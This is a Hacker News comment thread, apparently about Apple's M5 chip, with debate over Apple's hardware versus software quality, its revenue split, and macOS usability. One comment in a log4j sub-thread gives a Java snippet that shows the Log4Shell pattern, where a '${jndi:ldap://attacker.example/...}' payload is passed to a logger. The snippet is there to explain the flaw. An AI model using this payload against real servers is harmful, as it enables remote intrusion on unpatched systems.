      If you think hardware can't bloat, I suggest you look into the history of Intel's attempts to replace x86. Or the VAX. Not to mention the tons of minicomputer companies that built ever more complex minis. Or the supercomputer startup bubble.

  • geodel 8 hours ago

    Well, besides software that runs in data centers/the cloud, most other software is turning to crap. And people who think this crap is fine have now reached positions of responsibility at a lot of companies. So things will only get worse from here.

    • sho_hn 8 hours ago

      Except community-developed open source software, which (slowly, perhaps) keeps getting better and has high resistance to enshittification.

      • geodel 8 hours ago

        The OSS that keeps getting "better" is the kind that accepts a lot of user feature requests and/or implementations; otherwise the maintainers are hostile to users. And when they do accept most of those requests and code, we all know how it goes.

      • Noaidi 8 hours ago

        This right here is moving me back to GrapheneOS and Linux. I was lucky enough to be able to uninstall Liquid glAss before the embargo. I will miss the power efficiency of my M1, but the trade-offs keep looking better and better.

        Being poor, I need to sell my MacBook to get money to pay off my 16e, then sell the 16e and use that money to buy a Pixel 9, then probably buy a ThinkPad X1 Carbon. Just saying all that to show you the lengths I am going through to boycott/battle the enshittification.

        • pbronez 8 hours ago

          If you already have an M1 MacBook, why not run Asahi Linux?

          • Noaidi 7 hours ago

            Is it functional yet? Last I looked at it was about a year ago. Do you have any real use experience of it?

            • kroaton 37 minutes ago

              Look higher up in the thread, someone did a full breakdown.

      • Aperocky 8 hours ago

        Remember log4j? I don't share your enthusiasm.

        At least it's open source and free, I guess.

        • jacquesm 7 hours ago

          What is your point, even? That open source has bugs? That closed source does not have such bugs?

          • Aperocky 7 hours ago

            You won't have that bug if the logger isn't trying to talk to some LDAP server.

            It's not even about open source or closed source at this point. It's about feature creep.

            • bzzzt 7 hours ago

              It's not talking to an LDAP server; it's the functionality for talking to an LDAP server that causes the issue. Even if you don't need LDAP, you're still vulnerable when a client can inject information into a log message.

              • Aperocky 2 hours ago

                Why is this functionality needed in the first place? I want to write logs, some kind of string, into some kind of file, with rotation, and maybe send them somewhere that expects logs.

                Why parse whatever is in the logs, at all?

                Imagine the same stuff in your SSH client: it would parse the content before sending it over because some functionality requires it to talk to some server somewhere. It's insanity.

                • bzzzt an hour ago

                  Log4j contains a very big collection of extensions for just about anything, including inserting data from various sources. Of course it's overkill for lots of situations, but nobody ever uses all the functionality. It's just that nobody can agree on which functionality is useless ;)

          • geodel 7 hours ago

            Indeed, software used by thousands of commercial products and millions of enterprise applications, with ZERO dollars of support from either, must be maintained at a perfect, bug-free level by lazy volunteers. Because the internet demands it.

            • bzzzt 7 hours ago

              Would it even be possible to create today's software ecosystems by mandating all libraries are maintained and supported to the strictest standards?

              That would be the end of open source, hobbyists and startup companies because you'd have to pay up just to have a basic C library (or hope some companies would have reasonable licensing and support fees).

              Remember, one of the first GNU projects was GCC, because a compiler was an expensive, optional piece of software on the UNIX systems of those days.

              • jacquesm 6 hours ago

                That would be the end of the software industry. No company outside of aerospace and medical devices is capable of delivering this and I even have my doubts about those two, though at least they are trying.

        • usefulcat 8 hours ago

          That was a bug, not at all the same thing as enshittification.

          • Aperocky 7 hours ago

            It was enshittification. A logging framework that looks up LDAP servers? Why?

            Adding extra features that aren't necessarily needed is enshittification, and very not-unix.

            • bzzzt 7 hours ago

              It's not really added functionality, more an unintended consequence of too much flexibility. Java contains JNDI (the Java Naming and Directory Interface), a very unified 'directory' system for all kinds of configuration, of which LDAP is just one of the backend implementation options. The key issue is that you can call into other objects, which is unwise to do with untrusted user input.
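
              For anyone who hasn't seen it, here's a minimal sketch of that pattern (assuming a vulnerable log4j 2.x, pre-2.15, on the classpath; the names here are illustrative, not from the CVE writeup):

                  import org.apache.logging.log4j.LogManager;
                  import org.apache.logging.log4j.Logger;

                  public class LookupDemo {
                      private static final Logger log = LogManager.getLogger(LookupDemo.class);

                      public static void main(String[] args) {
                          // Untrusted input, e.g. a User-Agent header lifted straight from a request.
                          String userAgent = "${jndi:ldap://attacker.example/a}";

                          // On vulnerable versions, log4j expands the ${jndi:...} token in the
                          // formatted message and performs a live JNDI/LDAP lookup, so merely
                          // logging untrusted input triggers an outbound connection.
                          log.error("request from {}", userAgent);
                      }
                  }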

              • Aperocky 2 hours ago

                > The key issue is you can call into other objects which is unwise to do when used with untrusted user input.

                This. And while in this case it is specifically unwise in security terms, there are plenty of other examples where the features are purely cosmetic and deviate from the core user requirements/scenarios.

  • SCdF 7 hours ago

    I don't think it's the modern Apple, I think that's just Apple.

    I remember using iTunes when fixing the name of an album was a modal blocking function that had to write to each and every MP3, one by one, in the slowest write I have ever experienced in updating file metadata. Give me a magnetised needle and a steady hand and I could have done it faster.

    A long time ago they had some pretty cool design guides, and the visual design has often been nice, but other than that I don't think their software has been notable for its quality.

    • robenkleene 4 hours ago

      Apple makes Logic Pro, Final Cut Pro, Notes, Calendar, Contacts, Pages, Numbers, Keynote, Freeform, just from a "quality" standpoint, I'd rank any of those applications as competitive for the "highest quality" app in their category (an admittedly difficult thing to measure). In aggregate, those applications would make Apple the most effective company in the world at making high-quality GUI applications.

      Curious if I'm missing something though, is there another entity with a stronger suite than that? Or some other angle to look at this? (E.g., it seems silly to me to use an MP3 metadata example when you're talking about the same company that makes Logic Pro.)

      • SCdF 2 hours ago

        Of those apps you've listed that I've used, none of them have been notable for being high quality to me, though as you say it's difficult to measure. For me I would rate them somewhere between unremarkable (notes, calendar, contacts!?) and awkward (pages, numbers, keynote). If you asked me to guess what desktop software Apple makes that people rate highly, I never would have guessed any of those, except _maybe_ Logic[1] and Final Cut, though ironically those are two of the three I've never used.

        I also think you're confusing what I wrote. It's not a competition.

        I have just found that Apple's hardware on desktop has been stronger than their software, in my experience (periodic sporadic use, ~2006->now).

        [1] and now from a sibling comment I hear that perhaps people regard that tool as bad, so there you go, the jury is clearly out

        • robenkleene 2 hours ago

          What software do you find to be higher quality and why? That's the only valid way of even trying to have this conversation.

          E.g., I'd rank something like VS Code "lower quality" because when I launch VS Code, I can see each layer of the UI pop in as it's created: first I see a blank window, then I see the window chrome being loaded, then I see a row of icons being loaded on the left. This gives an impression of the software not being solid, because it feels like the application is struggling just to display the UI.

          > I also think you're confusing what I wrote. It's not a competition.

          > I have just found that Apple's hardware on desktop has been stronger than their software, in my experience (periodic sporadic use, ~2006->now).

          I disagree with this; the only way to make an argument that Apple has deficiencies in their software is to demonstrate that other software is higher quality than Apple's. Otherwise it could just be that Apple's quality level is the maximum feasible level of quality.

          > unremarkable (notes, calendar, contacts!?) and awkward (pages, numbers, keynote).

          This is laughable. Notes is unremarkable? Give me a break. And Keynote is awkward? Have you ever Googled how people feel about these applications?

          I'd argue a critic only has value if they're willing to offer their own taste for judgement.

      • bigyabai 2 hours ago

        Do you regularly use the alternatives to these programs? Admittedly I'm not cut out to judge the office suite, but the consensus in the music world seems to be that Logic Pro is awful. It lacks support for lots of plugins and hardware, and costs loads for what is essentially a weaker value prop than Bitwig or Ableton Live. Most bedroom musicians are using Garageband or other cheap DAWs like Live Lite, and the professional studios are all bought into Pro Tools or Audition. Don't even get me started on the number of pros I see willingly use Xcode...

        It's not exactly clear to me what niche Apple occupies in this market. It doesn't feel like "native Mac UI" is a must-have feature for DAWs or IDEs alike, but maybe that's just my perspective.

        • robenkleene 2 hours ago

          Yes, I use Ableton Live every day.

          > It lacks support for lots of plugins and hardware, and costs loads for what is essentially a weaker value prop than Bitwig or Ableton Live.

          This is an obviously silly statement: not only is Logic Pro competitively priced ($200, relative to $100-$400 for Bitwig and $99-$750 for Live), but those applications obviously have different focuses than Logic Pro (sound design and electronic music, versus Logic Pro's more general-purpose recording focus). Also, you'd be hard-pressed to find anyone who doesn't think Logic Pro comes with the best suite of stock plugins of any DAW, so the value-prop angle is a particularly odd argument to make (i.e., Logic Pro is pretty obviously underpriced). But all this isn't that important, because many of these applications are great. DAWs are one of the most competitive software categories around; there are several applications folks will vehemently defend as the best, and Logic Pro is unequivocally one of them.

          But all this isn't that important because many of these applications are great. DAWs are one of the most competitive software categories around and there are several applications folks will vehemently defend as the best and Logic Pro is unequivocally one of them.

          > Most bedroom musicians are using Garageband or other cheap DAWs like Live Lite, and the professional studios are all bought into Pro Tools or Audition.

          This is old, but curious if you have a better source for your statement https://blog.robenkleene.com/2019/06/10/2015-digital-audio-w...

          Found a more recent survey https://www.production-expert.com/production-expert-1/2024-d...

          > We can see that Pro Tools for music is the most popular choice, with Logic for music second and Pro Tools for post coming third.

          Note that I'd say Logic Pro's popularity is actually particularly notable since it's not cross-platform, so the addressable market is far smaller than the other big players'. It's phenomenally popular software, both in terms of raw popularity and fans who rave about it. E.g., note the contrast in how people talk about Pro Tools vs. Logic Pro: Logic Pro has some of the happiest users around, while Pro Tools customers talk like they're hostages to the software. That difference is where the quality argument comes in.

  • alexanderson 8 hours ago

    Apple has always been a hardware company first - think of how they sell consumers computers with the OS for free, while Microsoft primarily just sells the OS (when comparing the consumer business; I don’t want to get into all the other stuff Microsoft does).

    Now that they own the SoC design pipeline, they’re really able to flex these muscles.

    • ViktorRay 7 hours ago

      Steve Jobs himself said that Apple sees itself as a software company

      https://youtu.be/dEeyaAUCyZs

      The above link is a video where he mentions that.

      It is true that Apple’s major software products like iOS and MacOS are only available on Apple’s own hardware. But the Steve Jobs justification for this (which he said in a different interview I can’t find right now so I will paraphrase) is that he felt Apple made the best hardware and software in the world so he wanted Apple’s customers to experience the best software on the best hardware possible which he felt only Apple could provide. (I wish I could find the exact quote.)

      Anyway according to Steve Jobs Apple is a software first company.

    • alt227 8 hours ago

      Apple has always been a software-first company, and they only sell the hardware as a vehicle for their software. They regularly say this themselves and have always called themselves a software company. Compare their hardware revenues with those of the App Store and iCloud subscriptions, and you will see where they make most of their money.

      EDIT: I seem to be getting downvoted, so I will just leave this here for people to see I am not lying:

      https://www.businessinsider.com/tim-cook-apple-is-not-a-hard...

      • achierius 8 hours ago

        > Compare their hardware revenues with that of the app store and icloud subscriptions, you will see where they make most of their money.

        Yes, it's $70B a year from iPhones alone and $23B from the totality of the Services org. (including all app store / subscription proceeds). Significantly more than 50% of the company's total profits come from hardware sales.

        • ertgbnm 7 hours ago

          In addition, making money off the software that others develop and sell on the app store doesn't make Apple more of a software company, it makes them a middle man.

          • alt227 7 hours ago

            IMO a middle man means you are in between 2 other services, taking a cut off the top. In this instance, Apple not only created and curates the App Store, but also invented the concept. In this case they are definitely not a middle man; they are a software company selling access to their software to developers.

        • alt227 7 hours ago

          Where are you getting these numbers from? Care to share a source?

          We should be comparing profit in those departments, not revenue. Do you have those figures?

          It is well known that companies often sell the physical devices at a loss in order to make the real money from the services on top.

          • adastra22 6 hours ago

            Apple does not sell hardware at a loss.

            • alt227 5 hours ago

              Yeah, everyone says stuff like this, but nobody can actually produce any reliable sources to show how much profit it actually makes. So until you can, it's all guesswork.

      • dylan604 6 hours ago

        Apple has always? Sure, maybe today, with the collection of a % of app sales, it looks like a software company. But if there were no iDevices, there'd be no need for an App Store. Your link is all about Cook, yet he was not always the CEO. Woz didn't care what software you ran; he just wanted the computer to be usable so you could run whatever software. Jobs wanted to restrict things, but it was still about the hardware. Whatever Cook thinks Apple is now doesn't mean it has always been as you claim.

        • alt227 4 hours ago

          You know, you might just have a point if you weren't completely making that all up.

          Steve Jobs consistently made the point that Apple's hardware is the same as everyone else's; what makes them different is that they make the best software, which enables the best user experience.

          Here see this quote from Steve Jobs which shows that his attitude is the complete opposite of what you wrote.

          https://www.youtube.com/watch?v=dEeyaAUCyZs

      • jsnell 8 hours ago

        Sure, let's compare.

        Apple's product revenue in this fiscal year has been $233B, with a gross margin of $86B.

        Their services revenue is $80B with $60B gross margin.

        • justincormack 7 hours ago

          Much of the service revenue is the payment from Google for search placement.

        • alt227 7 hours ago

          Source?

          • jsnell 3 hours ago

            Good grief. Apple's official financials.

            https://www.apple.com/newsroom/pdfs/fy2025-q3/FY25_Q3_Consol...

            Look, I totally understand making an off-hand comment like you did based on a gut feeling. Nobody can fact-check everything they write, and everyone is wrong sometimes. But it is pretty lazy to demand a source when you were just making things up. When challenged with specific and verifiable numbers, you should have checked the single obvious source for the financials of any public company: their quarterly statements.

      • ksec 8 hours ago

        It goes back even further, Steve Jobs said Apple is a software company, you just have to buy its hardware to use it. It is the whole experience.

      • wat10000 8 hours ago

        I did that comparison and they make the vast majority of their money on hardware. Half of their revenue is iPhone, a quarter is services, and the remaining quarter is divided up among the other hardware products.

        Regardless of revenue, Apple isn't a hardware company or a software company. It's a product company. The hardware doesn't exist merely to run the software, nor does the software exist merely to give functionality to the hardware. Both exist to create the product. Neither side is the "main" one, they're both parts of what ultimately ships.

        • alt227 4 hours ago

          > The hardware doesn't exist merely to run the software

          Watch this and maybe you might change your mind:

          https://www.youtube.com/watch?v=dEeyaAUCyZs

          • wat10000 2 hours ago

            I think he's saying software is essential, not that it's the only thing. He contrasts the iPod with products from Japanese companies, which tend to make great hardware with crap software, and that software difference is why the iPod beat them.

            Modern Apple is also quite a bit more integrated. A company designing their own highly competitive CPUs is more hardware-oriented than one that gets their CPUs off the shelf from Intel.

        • alt227 7 hours ago

          Do the same calculation for profit instead of revenue.

          • wat10000 2 hours ago

            Are those numbers available? In any case, the comment said revenue, not profit.

      • HumblyTossed 8 hours ago

        Tim is the CEO, he's going to say whatever he needs to in the moment to drive investment.

        Apple is and always has been a HW company first.

        • alt227 7 hours ago

          OK, so I guess when the CEO of a company explicitly says something about their company, we should just ignore it because he is 'in the moment'?

    • Hamuko 8 hours ago

      Not really. Back in the day you wouldn't buy a MacBook because it was powerful. Most likely it had a very shitty Intel CPU without a lot of cores and with thermal challenges, and the reason you bought it was macOS.

      • chasil 8 hours ago

        And in decades past, OpenStep was slowly moving its GUI from NeXT hardware to software sales on various UNIX platforms and Windows NT.

        And this would eventually evolve into MacOS.

        https://en.wikipedia.org/wiki/OpenStep

      • hamdingers 5 hours ago

        Nope, many bought it in spite of macOS because it was a durable laptop with an excellent screen, good keyboard, and (afaik still) the only trackpad that didn't suck.

      • fnord123 8 hours ago

        The Intel laptops also grounded themselves through the user. I still can't believe they didn't have a recall to sort that out.

      • alt227 8 hours ago

        > very shitty Intel CPU with not a lot of cores and with thermal challenges

        Very often the Intel chips in MacBooks were stellar; they were just seriously inhibited by Apple's terrible cooling designs and so were permanently throttled.

        They could never provide decent cooling for the chips coupled with their desire to make paper thin devices.

        • kllrnohj 7 hours ago

          > They could never provide decent cooling for the chips coupled with their desire to make paper thin devices.

          Curiously they managed to figure this out exactly when it became their silicon instead (M1 MacBook Pros were notably thicker and with more cooling capacity than the outgoing Intel ones)

          • alt227 7 hours ago

            I still believe they purposefully throttled the last gen of intel Macs just to make people have bad memories of them.

          • bzzzt 7 hours ago

            I presume they were just playing it safe to not let the M1 migration flop. If you're dragging your users through a big migration the last thing you need is complaints about the new hardware...

        • scrlk 7 hours ago

          They made things even worse with fan curves tuned for silence until the CPU was practically at TjMax.

      • qwertytyyuu 8 hours ago

        Not just macOS; also the decent keyboard and an actually good display, guaranteed.

      • leptons 4 hours ago

        >the reason you bought it was because macOS.

        That is probably the least of the reasons why people buy Apple - to many it's just a status symbol, and the OS is a secondary consideration.

  • fidotron 8 hours ago

    What I would do for Snow Leopard on the M class hardware.

    • RossBencina 8 hours ago

      You could run it in an emulator.

    • asimovDev 7 hours ago

      do you mean literally 10.6 on AS or do you mean something as good as it was

      • fidotron 7 hours ago

        Something that good.

        It was coherent, (relatively) bug free, and lacked the idiot level iOSification and nagging that is creeping in all over MacOS today.

        I hadn't had to restart Finder until recently, but now even that has trouble with things like network drives.

        I'm positive there are many internals today that are far better than in Snow Leopard, but it's outweighed by user visible problems.

        It shouldn't surprise you, I think, that Android Jelly Bean was the best phone OS ever made as well, and they went completely in the wrong direction after that.

        • astrange 6 hours ago

          It was very easy to lose data in Snow Leopard because they hadn't introduced the document autosave system yet. That was the next version.

          • fidotron 4 hours ago

            You mean it only did things you told it to do? That's a feature.

            Programs could absolutely have much more controllable auto-save before, for when it made sense.

            • astrange 3 hours ago

              "I lose work when the power goes out" is not a feature. Neither is "I can't apply security updates because I can't restart".

              Speaking of security it didn't have app sandboxing either.

              • fidotron 2 hours ago

                You mean programs could access the file system normally? They were absolutely isolated as standard unix processes.

                This is what I mean about iOSification - it's trending towards being a non-serious OS. Linux gets more attractive by the day, and it really is the absence of proper support for hardware in the class of the M series that prevents a critical mass of devs from jumping ship.

  • whitehexagon 6 hours ago

    I dunno, didn't they already crack 400GB/s of memory bandwidth some years ago? This seems like just another small bump to handle the latest OS effects sludge.

    Now the M1 range, that really was an impressive 'outperform' moment of engineering for them, but otherwise this is just a clockwork, MBA-driven trickle of slightly-better, over-hyped future eWaste.

    To outperform during this crisis, hardware engineers worth their salt need to be designing long-lived boxes with internals that can be easily repaired or upgraded. "Yeah, but the RAM connections are fiddly." Great, now that sounds like a challenge worth solving.

    But you are right about the software. Installing Asahi makes me feel like I own my computer again.

    • astroflection 6 hours ago

      https://asahilinux.org/

      "Linux on Apple Silicon: Asahi Linux aims to bring you a polished Linux® experience on Apple Silicon Macs."

      Why the "®" after Linux? I think this is the first time I've seen this.

      • utf_8x 6 hours ago

        The Linux "brand" is trademarked by Linus Torvalds, presumably to stop things like "Microsoft® Linux®" from happening...

  • textlapse 3 hours ago

    It does feel like Apple is firing on all cylinders for their core competencies.

    Software (iOS 26), services (Music/TV/Cloud/Apple Intelligence) and marketing (just keep screaming Apple Intelligence for 3 months and then scream Liquid Glass), on the other hand, seem like they are losing steam or being very reactive.

    No wonder John Ternus is widely anticipated to replace Tim Cook (and not Craig).

  • tyrellj 6 hours ago

    This seems to be pretty true in general. SBC companies are not competing with Raspberry Pi because their software is quite a bit behind (bootloaders, Linux kernel support, etc.). Particle released a really cool dev board recently, but the software is lacking. Qualcomm struggled with their new CPU launch with poor support as well. And it sometimes takes a while for new Intel processor features to be supported in the toolchains and the kernel, and then to get used in software.

    Aside from that, I think of Apple as a hardware company that must write software to sell their devices, maybe this isn't true anymore but that's how I used to view them. Maintaining and updating as much software as Apple owns is no small task either.

  • JKCalhoun 7 hours ago

    There has to be a whole different mindset with hardware, though. Every change necessarily has to be more considered, cross-checked. And I don't say this in any way to disparage software engineers (holds up hand), but I suspect there's a discipline in hardware design that is ... less rigidly adhered to in software design. (And a software update containing a revert, though undesirable, is always a solution.)

  • TheAtomic 8 hours ago

    Yup. And the marketing department is ahead of both of them.

  • eloisant 8 hours ago

    Apple have always been a hardware company, like Google have always been a software company even if they're doing hardware too now.

    • steve1977 7 hours ago

      Google has always been an advertising company.

      • tempest_ an hour ago

        It wasn't always, but it's definitely been the host for the DoubleClick parasite it ingested in the early 2000s.

    • CharlesW 6 hours ago

      > Apple have always been a hardware company…

      Apple (post Apple II) has always been a systems company, which is much different. Dell is a hardware company.

  • thomascgalvin 8 hours ago

    > The modern Apple feels like their hardware teams way outperforming the software teams.

    There aren't a lot of tangible gains left to be made by the software teams. The OS is fine, the office suite is fine, the entertainment apps are fine.

    If "performance" is shoving AI crap into software that was already doing what I wanted it to do, I'd rather the devs take a vacation.

    • butlike 7 hours ago

      There were a few things on that page that made me excited for the future of where computing is going, but I do think we're going to hit a "lull" in terms of exciting new features until some of the really futuristic stuff comes to pass.

      Who knows, maybe the era of "exciting computing" is over, and iteration will be a more pleasant and subtle gradient curve of improvements, over the earth-shattering announcements of yore (such as the advent of popular cellular phones).

      • scbzzzzz 7 hours ago

        True. I would like to hijack this thread to discuss what we want from software that doesn't exist yet. For me, all I can think of is on-device AI/ML (photo editing, video editing, etc.), and not the kind the current companies are trying so hard to shove down our throats.

        Maybe Steve was right: we don't know what we want until someone shows it to us.

  • kace91 8 hours ago

    There is talk of the hardware head replacing Cook.

    Hopefully that will bring whatever they’re doing right to other teams.

    • butlike 7 hours ago

      I really liked the energy of the guy who announced the iPhone Air this past WWDC or whatever it's called now. John Ternus. Hopefully he makes it there (CEO) one day; I'd like to see it.

      • thewebguyd 7 hours ago

        Ternus is who the parent was referring to, he's SVP of hardware engineering and suspected to be Cook's successor.

  • elicash 8 hours ago

    For the Vision Pro, the software team has been impressive, and arguably outperformed the hardware team.

    But this is the exception.

  • mproud 5 hours ago

    The hardware team has always shined, but how about one example of this:

    The PowerBooks from the mid-1990s were hugely successful, especially the first ones, which were notable for what we now take for granted: pushing the keyboard back to allow space for palm rests. Wikipedia says at one time Apple had captured 40% of the laptop market. Yet all the while the ’90s roared on, Apple was languishing, looking for a modern OS.

  • foofoo12 8 hours ago

    It must be observed that the Apple enterprise is, above all else, a purveyor of fine physical contrivances and apparatus.

    Furthermore, they do also engage in the traffic and sale of digital programmes wrought by the hands of other, independent artisans.

  • gloosx 3 hours ago

    From my vast experience with MacOS, Apple is notoriously bad at the most basic software, like Notes or Calculator.

  • nabla9 7 hours ago

    Doing a good job is rewarded.

    Apple's Hardware Chief, John Ternus, seems to be next in line for succession to Tim Cook's position.

    • utf_8x 6 hours ago

      Interesting, I thought the next in line was Craig Federighi

  • mcv 8 hours ago

    I want this hardware available for other systems.

    • ksec 8 hours ago

      The modern ARM C1 Ultra core is only 10% slower than the M5, likely even less when you factor in system-level cache and memory. So the gap isn't as wide as most people think it is.

      • mcv an hour ago

        That sounds awesome. Can we get laptops with that thing? We should be getting rid of the power hungry x86 stuff.

      • hamdingers 5 hours ago

        What laptops is that chip featured in?

  • amelius 6 hours ago

    Yes. And their consumer teams are way outperforming their business teams.

  • tantalor 8 hours ago

    Been like that since 1977

  • crazygringo 4 hours ago

    Apple is a hardware company. This has always been the case. It's not just the modern Apple.

  • 7e 7 hours ago

    Apple relies heavily on H-1B slave labor. They don’t pay their software teams enough to be competitive, and they run with only about a third of the headcount they need to polish the software. Thus, they have mediocre talent and not enough of it. Penny-wise, pound-foolish.

  • oofbey 5 hours ago

    In a sense, hardware's job is easier because the goals are clearer: make it faster and more power-efficient. There are vast amounts of complexity within those goals, but try to summarize the north-star vision for a complex software project like an OS anywhere near as simply as that.

  • wslh 7 hours ago

    I've been thinking about whether it could be a reasonable move for Apple to launch a cheaper secondary brand, one that offers devices capable of running Linux or Windows, to reach a broader market without cannibalizing its own.

    • dawnerd 7 hours ago

      Apple already sells pretty competitively priced computers. The base Mac mini for example. For most people that’s already overkill.

  • throw_this_one 8 hours ago

    Their software is literally falling apart. iOS 26 was the biggest trash I've ever experienced from a company this big.

    • pivo 7 hours ago

      How so? Seriously asking because it works fine for me.

      • throw_this_one 6 hours ago

        Buggy. Random slowness in the UI, going well below 120Hz. Massive battery drain for no reason. UI elements just looking out of place, big print, in random places.

        The UI itself is supposed to be intense to render to some degree. That's crazy because most of the time it looks like an Android skin from 2012.

        And on top of all this -- absolutely nobody asked for it. No one asked for some silly new UI that is transparent or whatever.

        • lijok 5 hours ago

          Sounds like an experience problem

    • vuggamie 7 hours ago

      I'm old enough to remember Windows CE phones crashing during phone calls.

  • markus_zhang 7 hours ago

    I pretty much see the MacBook as a fancy toy with mediocre software. Maybe the kernel is solid, but the other software is very meh, even compared to Windows. But I'm definitely biased as a Windows/Linux user, and my hobby is systems programming, so naturally a Linux box is more suitable.

    Biggest grief with MacOS software:

    - Finder is very mediocre compared to even File Explorer on Windows

    - Scrollbar and other UI issues

    Unfortunately I don't think Asahi is going to catch up, and MacBooks are so expensive, so I'll probably keep buying second-hand Dell/Lenovo laptops and dumping Linux on top of them.

    • Sohcahtoa82 6 hours ago

      > - Finder is very mediocre compared to even File Explorer on Windows

      It really is awful. Why the hell is there no key to delete a file? Where's the "cut" option for moving a file? Why is there no option for showing ALL folders (i.e., /bin, /etc) without having to memorize some esoteric key combination?

      For fuck's sake, even my home directory is hidden by default.

      > - Scrollbar and other UI issues

      Disappearing scrollbars make sense on mobile where screen real estate is at a premium and people don't typically interact with them. It does not make sense on any screen that you'd use a mouse to navigate.

      For years, you couldn't even disable mouse acceleration without either an esoteric command line or 3rd-party software. Even now, you can't disable scroll-wheel acceleration. I hate that I can't just get a consistent "one click = ~2 lines of text" behavior.

      I could go on and on about the just outright dumb decisions regarding UX in MacOS. So many things just don't make sense, and I feel like they were done for the sole purpose of being different from everyone else, rather than because of a sense of being better.

      • dd_xplore 4 hours ago

        You know, IMHO Apple doesn't have any 'Pro' machines. A 'Pro' machine isn't about hardware (although it helps); it comes mainly from the software.

        MacOS doesn't have enough 'openness' to it. There's no debug information, a lack of tools, etc. To this day I could still daily-drive an XP or 98/2000 machine (if they supported the modern web) because all the essentials are still intact. You can look around the system files, customize them, edit them. I could modify game files to change their behaviour. I could modify the Windows registry in tons of ways to customize my experience and experiment with lots of things.

        As a 'Pro' user my first expectation is options, options in everything I do, which MacOS lacks severely.

        All the random hardware that we see launching from time to time has drivers for Windows but not for Mac. Even Linux has tons of terminal tools and customisation.

        MacOS is like a glorified phone OS. It's weirdly locked down in certain places in ways that drive you crazy. Tons of things do not have context menus (Windows is filled with them).

        Window management sucks; there's no device manager! Not even CLI tools! (Or maybe I'm not aware?) Why can't I simply cut and paste?

        There's no API/way to control system elements via scripting; Windows and Linux are filled to the brim with these! Even though the UI is good-looking, I just cannot switch to an Apple device (either Mac or iPhone) for these reasons. I bought an iPad Pro and I'm regretting it. There's no termux equivalent on iPadOS/iOS; there are some terminal tools, but they can't use the full processing power, they can't multi-thread, and they can't run in the background. It's just ridiculous. The iPad Pro is just a glorified iPhone. Hardware doesn't make a device 'Pro'; software does. Video editing isn't a 'Pro' workflow in the sense that it can be done on any machine that has sufficient oomph. An iPad Pro from 5 years ago will be slower than an iPad Air of today; does that make the Air a 'Pro' device? No!

        • astrange 3 hours ago

          > As a 'Pro' user my first expectation is options, options in everything I do , which MacOS lacks severely.

          It's a bad idea to add an option entirely for the purpose of making the product not work anymore.

          https://limi.net/checkboxes

          > Window management sucks

          I'm always mystified reading these kinds of posts on HN because it literally always starts out as "macOS is an OS for babies" and turns out to mean "macOS doesn't have a tiling window manager". Like, cmon man, who cares.

          > there's no device manager! Not even cli tools!

          `ioreg -l` or `system_profiler`. Why does this matter?

          > There's no API/way to control system elements via scripting

          https://developer.apple.com/library/archive/documentation/Ac...

          https://developer.apple.com/documentation/XCUIAutomation

          https://en.wikipedia.org/wiki/AppleScript

          https://support.apple.com/guide/shortcuts/welcome/ios

          • Sohcahtoa82 an hour ago

            > > Window management sucks

            > I'm always mystified reading these kinds of posts on HN because it literally always starts out as "macOS is an OS for babies" and turns out to mean "macOS doesn't have a tiling window manager". Like, cmon man, who cares.

            For me, it's not so much the window management as task management. I very strongly believe that the taskbar (I guess the Dock in macOS) should have a separate item for each open window of an app. If I have 3 Firefox windows open, that should be 3 entries in the taskbar/Dock so I can switch between them in a single click. I can do this in Windows; I can't do it in macOS.

            One of the problems I have with macOS is that it's not obvious how to start a second instance of an app. Sure, some apps have a "New Window" option. But what about apps that don't, like Burp Suite? If I bring up the launcher and click Burp Suite when one is already loaded, it just shows me the existing one.

      • cmiller1 6 hours ago

        > Why the hell is there no key to delete a file?

        Cmd+Delete? I don't really want it to be a single key, as that's too easy to trigger accidentally (say I try to delete some text in a filename but accidentally bump my mouse and lose focus on the name).

      • BeFlatXIII 3 hours ago

        > Why the hell is there no key to delete a file?

        Command+Backspace.

      • kemayo 6 hours ago

        > Why the hell is there no key to delete a file?

        Command + backspace.

    • lou1306 7 hours ago

      What makes the Mac great is/was the ecosystem of 3rd-party tools with great UI and features. Apple used to be good enough at writing basic 1st-party apps that would mostly just disappear into the background and let you do your thing, but they are getting increasingly "louder", which... may become a problem.

      I still agree that second hand Thinkpads are ridiculously better in terms of price/quality ratio, and also more environmentally sustainable.

      • markus_zhang 7 hours ago

        I have to admit, every time I look at screenshots of earlier Macs, like the 68K and PPC ones, I feel I love the UI and such. I even bought a PPC laptop (I think it's a maxed-out iBook with 1.5GB of RAM) to tinker with PPC assembly.

        But I could be wrong. Maybe the earlier Macs didn't have great software either -- but at least the UI is better.

        • prewett 3 hours ago

          Having lived through those days... well, it was good for the time, mostly. MacOS was definitely better than Windows 3.11, and a lot more whimsical, both the OS and Mac software in general, which I miss. The feature set, though, was limited. Managing extensions was clunky, and until Mac OS X, applications had a fixed amount of RAM they could use, which could be set by the user but was allocated at program start. It was also shared memory, like Windows 3.11 and to some extent Windows 95/98, so one program could, and routinely did, take down the whole OS. With Windows NT (not much adopted by consumers, to be fair), this did not happen. Windows NT and 2000 were definitely better than MacOS, arguably even UI-wise.

          I do miss window shading from MacOS 8 or 9, though. I think a whimsical skin for MacOS would be nice, too. The system-error bomb icon was classic; the sad-Mac boot-failure icon was at least a consolation. Now everything is cold and professional, but at least it stays out of my way and looks decent.

          • markus_zhang 2 hours ago

            Interesting. I thought the new MacOS was unix-y? But I never owned a Mac back then, so I'm not sure. For me Windows 2000 is the pinnacle: it didn't crash (often), it supported most of the games I played back then, and I like the UI design.

outcoldman 7 hours ago

Marketing:

The M5 announcement [1] says 4x the peak GPU compute performance for AI compared to M4. I guess in the lab?

Both the iPad and MBP M5 pages [2][3] say "delivering up to 3.5x the AI performance". But in all the AI examples (in [3]), they are 1.2-2.3x faster than the M4. So where is this 3.5x coming from? What tests did Apple do to show that?

---

1. https://www.apple.com/newsroom/2025/10/apple-unleashes-m5-th...

2. https://www.apple.com/newsroom/2025/10/apple-unveils-new-14-...

3. https://www.apple.com/newsroom/2025/10/apple-introduces-the-...

  • storus 5 hours ago

    The M5 is supposed to support FP4 natively, which would explain the speedup on Q4-quantized models (down from BF16).
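
    Back-of-the-envelope, assuming a fixed-width vector datapath and ignoring memory effects (my reading, not Apple's published math): a lane that holds one BF16 operand can hold four FP4 operands, so

        peak FP4 ops / peak BF16 ops ≈ 16 bits / 4 bits = 4x

    which is how a "4x peak GPU compute for AI" headline can coexist with the much smaller 1.2-2.3x end-to-end gains on real workloads.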

  • relativeadv 7 hours ago

    It's not uncommon for Apple and others to compare against two generations ago rather than the immediately preceding one.

    • outcoldman 5 hours ago

      Everything I referenced compares against the M4; I left the M1 comparisons out.

paxys 5 hours ago

